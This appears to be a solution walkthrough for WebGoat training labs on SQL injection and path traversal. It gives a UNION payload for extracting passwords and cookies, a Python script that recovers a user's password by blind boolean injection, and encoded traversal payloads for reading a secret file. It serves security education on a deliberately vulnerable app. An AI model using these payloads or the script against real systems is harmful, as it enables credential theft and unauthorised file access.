Injection

SQL Injection Intro

SQL Injection Advance

3/

The table userdata has 7 columns while user_system_data has only 4, so the UNION query has to pad the shorter side with NULLs to make the column counts match:

' union select userid, user_name, password, cookie, null, null, null from user_system_data;--

5/

import requests
import string

# Blind boolean SQL injection through the registration form: the username
# field is injected with a condition on tom's password, one character at a
# time. When the condition is true the server answers "already exists".
url = 'http://localhost:8080/WebGoat/SqlInjectionAdvanced/challenge'
cookie = {"JSESSIONID": "sQ7Ew5BK_IUP7cCxfeu1oOviaQsNxE99PzLtVzg0"}  # copy from your browser session
# The single quote is left out of the charset: it would break the injected query.
charset = string.ascii_letters + string.digits + string.punctuation.replace("'", "")

password = ''
i = 1
while True:
    for c in charset:
        payload = f"tom' AND substr(password,{i},1)='{c}'--"
        r = requests.put(url, cookies=cookie, data={'username_reg': payload, 'email_reg': 'tom@gmail.com',
                                                    'password_reg': '1', 'confirm_password_reg': '1'})
        if 'already exists' in r.text:
            print(c)
            password += c
            break
    else:
        break  # no character matched at position i: the password ended at i-1
    i += 1
print(password)

SQL Injection Mitigation

Path traversal

2/ Path traversal while uploading files

Set the full name to ../test and update the profile: the full name is used to build the upload path, so the file is written one directory above the upload folder.

3/ Path traversal while uploading files

../ is removed, but only in a single pass. Use ..././ instead: once the filter strips the inner ../, what remains is ../ again.

4/ Path traversal while uploading files

Not the same as the previous challenges: the path no longer follows the full name when you update it. The filename of the uploaded file is used instead, so intercept the upload request and put the traversal in the filename.

5/ Retrieving other files with a path traversal

When you click "show random cat picture", a cat picture is shown. Intercept the request: the response carries an id parameter whose value is the picture name.

Sending that parameter with a value like ../ returns a stream of illegible characters.

URL-encode the value and you get the secret file instead.

Final payload: %2e%2e%2f%2e%2e%2fpath-traversal-secret

Don't append .jpg: the server adds it automatically.
